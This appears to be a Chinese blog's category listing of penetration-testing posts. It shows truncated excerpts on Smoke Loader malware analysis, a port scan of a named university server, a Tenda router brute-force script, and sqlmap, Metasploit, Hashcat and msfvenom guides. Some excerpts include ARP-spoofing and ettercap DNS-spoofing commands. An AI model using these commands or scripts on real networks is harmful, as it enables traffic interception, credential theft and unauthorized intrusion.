![](https://img-blog.csdnimg.cn/20201014180756724.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透
文章平均质量分 53
「已注销」
这个作者很懒,什么都没留下…
展开
-
Smoke Loader
分析样品此分析的主要重点是下面的示例,该示例由Rig EK删除:bce202c021feb61783563e21fc026767 –原始样本d363e8356c82a1043bb300c12c6c7603 –已包装(第1阶段)8932d2eacc4dfc7b2f0a94363a854610 –核心DLL(阶段2)上面的示例下载:有效负载:f60ba6b9d5285b834d844450b4db11fd –(这是一个IRC漫游器,C&C:med-global-fox [DOT] com)翻译 2021-02-16 06:11:55 · 570 阅读 · 0 评论 -
某工商大学服务器端口扫描
3128/tcp open squid-http3168/tcp open poweronnud3211/tcp open avsecuremgmt3221/tcp open xnm-clear-text3260/tcp open iscsi3261/tcp open winshadow3268/tcp open globalcatLDAP3269/tc...原创 2020-03-13 11:19:00 · 3740 阅读 · 1 评论 -
暴力破解Tenda企业路由
# -*- coding: utf-8 -*-import hashlibimport ioimport sysimport osimport requestsimport urllibimport base64def Dict_Data(): f = open('data/dict.txt', 'r+') data = [] line = f.r...原创 2019-06-27 19:25:10 · 2378 阅读 · 0 评论 -
超详细SQLMap使用攻略及技巧分享
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。sqlmap目前最新版本为1.1.8-8,相关资源如下:官方网站:http://sqlmap.org/,下载地址:htt...转载 2019-06-11 13:33:52 · 2267 阅读 · 0 评论 -
Metasploit 「跨网段攻击」添加路由表
情况?Mac【Metasploit】:192.168.43.100Win7【跳板机】:192.168.215.144【Nat】、172.16.63.128【仅主机】Linux【目标机】:172.16.63.129【仅主机】,开启80端口方便检测验证需要解释下这里跳板机为啥采用Nat方式获取ip,而不是桥接?因为主机Mac上网是连的CMCC-EDU,在校也很无奈额......转载 2019-06-09 12:38:29 · 5666 阅读 · 2 评论 -
Hashcat的使用手册总结
简介Hashcat是自称世界上最快的密码恢复工具。它在2015年之前拥有专有代码库,但现在作为免费软件发布。适用于Linux,OS X和Windows的版本可以使用基于CPU或基于GPU的变体。支持hashcat的散列算法有Microsoft LM哈希,MD4,MD5,SHA系列,Unix加密格式,MySQL和Cisco PIX等。hashcat支持多种计算核心:GPUCPUAP...转载 2019-05-10 16:19:44 · 35082 阅读 · 1 评论 -
Cat-Nip:专用于Kali Linux的自动化基础渗透测试工具
今天给大家介绍的是一款名叫Cat-Nip的开源渗透测试工具,该工具针对Kali Linux开发,可帮助研究人员自动化完成基础的渗透测试。这些基础的渗透测试任务包括信息收集、安全审计以及安全报告,而且这些任务Cat-Nip都可以帮助我们自动化地去完成。工具使用指南下载/克隆Cat-Nip项目:ActionScript~#git clone https://github.com/ba...转载 2019-04-29 23:03:41 · 659 阅读 · 0 评论 -
Msfvenom – Metasploit 生成 Payloads 备忘录
msfvenom选项:-p,–payload<payload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l,–list[module_type]列出指定模块的所有可用资源.模块类型包括:payloads,encoders,nops,all...转载 2019-04-29 17:14:37 · 520 阅读 · 0 评论 -
中间人攻击替换图片
一:先准备一张图片恩恩!低调点好!我们将图片放大kali的var/www/html目录下二:启动Apacheservce apache2 start 三:编写攻击脚本if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) {...转载 2019-04-15 00:05:01 · 3745 阅读 · 3 评论 -
中间人攻击 图片
arpspoof -i etch0(攻击者网卡) -t 192.168.2.1(网关) 192.168.1.2.157(被攻击者IP)监控 driftnet -i etch0查看本地arp缓存 arp -a清除arp缓存 arp -d语法: driftnet [options] [filter code]主要参数:-b...转载 2019-04-15 00:00:03 · 563 阅读 · 0 评论 -
ettercap之dns欺骗
vi /etc/ettercap/etter.dnsettercap -i eth0 -Tq -P dns_spoof -M arp:remote /// ///原创 2019-04-14 23:39:23 · 643 阅读 · 0 评论 -
Kali嗅探HTTP/HTTPS中的密码
# 黑客技术 局域网arp欺骗<!-- 发现目标IP -->fping -g -r 0 -s 192.168.101.1/24 | grep alive192.168.101.1 is alive 网关192.168.101.104 is alive 目标IP192.168.101.100 is alive192.168.101.111 is alive Kali...原创 2019-04-14 22:58:23 · 5439 阅读 · 13 评论 -
DotDotPwn使用教程
title: DotDotPwncategories: Information Gatheringtags: [kali linux,dotdotpwn,information gathering,recon,http,exploitation tools]date: 2016-10-22 14:00:000x00 DotDotPwn介绍DotDotPwn是一个非常灵活的智能模糊...原创 2019-04-01 23:10:51 · 1501 阅读 · 0 评论 -
一些好用的Linux命令工具
一些好用的Linux命令工具刚好看到一个系列的博文,讲的就是那些平时很少被人用到但是很实用的命令,选一些觉得自己应该比较常用到的出来写个笔记。这些命令有些不是系统命令,需要自行下载安装。Debian下安装:sudo apt-get install XXXX。RHEL下安装:yum install XXXX。1、mtr,同时兼具ping和traceroute命令的功能:比如追踪发到w...转载 2019-03-28 00:25:03 · 1033 阅读 · 0 评论 -
VIM配置
花了很长时间整理的,感觉用起来很方便,共享一下。我的vim配置主要有以下优点:1.按F5可以直接编译并执行C、C++、java代码以及执行shell脚本,按“F8”可进行C、C++代码的调试2.自动插入文件头 ,新建C、C++源文件时自动插入表头:包括文件名、作者、联系方式、建立时间等,读者可根据需求自行更改3.映射“Ctrl + A”为全选并复制快捷键,方便复制代码4.按“F...转载 2019-03-27 00:01:55 · 160 阅读 · 0 评论 -
各大系统刷新DNS缓存方法
一、Linux重启nscd即可 /etc/init.d/nscd restart较老的版本 /etc/rc.d/init.d/nscd restart二、Windows以管理员身份运行Cmd ipconfig /flushdns三、Mac OS X执行以命令 sudo killall -HUP mDNSRespon...原创 2019-03-14 22:39:04 · 1721 阅读 · 0 评论 -
CentOS远程执行漏洞
完整标题:CentOS Web Panel Root帐户接管<= v0.9.8.740远程命令执行漏洞利用添加日期:2018年11月5日类别:远程执行漏洞CVE:CVE-2018-18773,CVE-2018-18772,CVE-2018-18774平台:PHP原创作者:InfinitumIT攻击载荷代码:[+] Title: CentOS Web Panel ...转载 2018-11-20 12:57:36 · 3479 阅读 · 0 评论